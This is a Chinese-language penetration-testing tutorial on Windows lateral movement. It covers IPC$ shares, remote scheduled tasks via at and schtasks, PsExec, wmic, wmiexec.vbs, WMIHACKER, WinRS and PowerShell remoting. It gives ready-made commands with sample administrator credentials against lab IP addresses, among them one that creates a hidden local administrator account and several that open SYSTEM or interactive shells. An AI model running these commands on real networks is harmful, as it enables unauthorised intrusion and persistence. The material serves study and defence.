内网常见横向移动姿势

IPC利用

概念：共享”命名管道”的资源，它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
作用：利用IPC$连接者甚至可以与目标主机建立一个连接，利用这个连接，连接者可以得到目标主机上的目录结构、用户列表等信息。
基本利用条件：开启139与445端口，管理员开启的默认共享

net use \\192.168.5.133\ipc$ "Aa123456" /user:administrator
net use 可查看到远程连接情况

常见连接失败原因：你的系统不是NT及以上系统、用户名密码错误、目标没有开启ipc$默认共享、不能成功连接目标139与445端口、命令输入错误
常见错误号：
错误号5，拒绝访问 ： 很可能你使用的用户不是管理员权限的，先提升权限；
错误号51，Windows 无法找到网络路径 : 网络有问题；
错误号53，找不到网络路径 ： ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；
错误号67，找不到网络名 ： 你的lanmanworkstation服务未启动；目标删除了ipc$； 
错误号1219，提供的凭据与已存在的凭据集冲突 ： 你已经和对方建立了一个ipc$，请删除再连。
错误号1326，未知的用户名或错误密码 ： 原因很明显了；
错误号1792，试图登录，但是网络登录服务没有启动 ： 目标NetLogon服务未启动。（连接域控会出现此情况）
错误号2242，此用户的密码已经过期 ： 目标有帐号策略，强制定期要求更改密码。

获取详细信息
dir \\192.168.5.133\c$

列出进程
tasklist /S 192.168.5.133 /U administrator /P Aa123456

使用at命令在远程机器上创建计划任务
查看系统目前时间
net time \\192.168.5.133

复制文件到系统中
copy 1.bat \\192.168.5.133\C$

使用at命令在系统指定时间允许程序
at \\192.168.5.133 17:05 C:\1.bat

到时间后可见进程内启动

定时任务是需要人工清理的 不会自动删除
at \\192.168.5.133 ? /delete

执行任务并输出至txt 随后再读取
at \\192.168.5.133 17:12 cmd.exe /c "ipconfig  >C:/2.txt"
type \\192.168.5.133\C$\2.txt

schtasks命令同理
远程主机创建yang名称的任务开机启动c盘下的1.bat启动权限为system

立即运行任务
schtasks /run /s 192.168.5.133 /tn "yang"

删除计划任务

PSEXEC利用

可以在远程计算机上执行命令，也可以将管理员权限提升到system权限以运行指定程序。基本原理是通过在远程目标机器上创建一个psexec服务，在本地磁盘生成一个名为psexesvc的二进制文件，然后通过psexec服务运行命令，运行结束后删除服务

需要获取目标操作系统的交互式shell，在建立了ipc$的情况下，如下，可以获取system权限
Psexec.exe -accepteula \\192.168.5.131 -s cmd.exe 不加-s会返回一个administrator权限

若没有建立ipc$连接，可以指定账户密码进行连接
Psexec.exe \\192.168.5.131 -u administrator -p Aa123456 cmd.exe

也可以直接进行命令的回显

msf上线如下

WMI利用

利用条件：
远程服务器启动Windows Management Instrumentation服务，开放TCP135端口，防火墙放开对此端口的流量（默认放开）

远程服务器的本地安全策略的“网络访问: 本地帐户的共享和安全模式”应设为“经典-本地用户以自己的身份验证”

利用方式：
执行命令wmic /node:ip /user:用户名 /password:密码 process call create "calc"
这里也可以进行bat脚本执行 process call create c:\programdata\test.bat

执行情况如下：

列出进程：
wmic /node:ip /user:用户名 /password:密码 process list brief

执行单条命令：
wmic  /node:ip /user:用户名 /password:密码 process call create "cmd.exe /c net user test1 !@#123QWE /add && net localgroup administrators test1 /add"

wmiexec.vbs利用

wmiexec.vbs 是为了解决 wmic 无法回显命令而开发的一个工具，原理就是把数据先存到一个临时文件中，在每次读取完执行结果后就自动删除。可以用来回显执行命令的结果和获取半交互式的shell

cscript wmiexec.vbs 查看使用介绍

cscript wmiexec.vbs /cmd 192.168.3.142 administrator Aa123456 whoami 执行命令：

cscript wmiexec.vbs /shell 192.168.3.142 administrator Aa123456 获得交互式shell:

WMIHACKER利用：

cscript WMIHACKER.vbs 查看使用介绍

cscript WMIHACKER.vbs /cmd 192.168.3.142 administrator Aa123456 whoami 1  执行命令 

cscript WMIHACKER.vbs /shell 192.168.3.142 administrator Aa123456  获得交互式shell

WinRS利用

利用条件
1、在Windows Vista上必须手动启动WinRM服务，但从Windows Server 2008开始，WinRM服务自动启动。
2、默认情况下，虽然WinRM服务后台已经运行，但并不开启监听模式，因此无法接受和发送数据。
3、使用WinRM提供的quickconfig对WinRM进行配置后，Windows将开启监听并打开HTTP及HTTPS监听端口，同时Windows防火墙生成这两个端口的例外。

winrm quickconfig对WinRM进行首次（默认）配置：

winrm enumerate winrm/config/listener  查看WinRM服务当前的配置情况：

winrm set winrm/config/client @{TrustedHosts="*"}手动配置当前服务器允许被任意主机连接：

winrs -r:http://192.168.3.142:5985 -u:administrator -p:Aa123456 ipconfig 连接即可

POWERSHELL利用

Enable-PSRemoting –force 开启PowerShell的远程连接：

另外一台机器直接连接即可：
enter-pssession -computername 192.168.3.142 -Credential administrator 需要手动再次输入密码：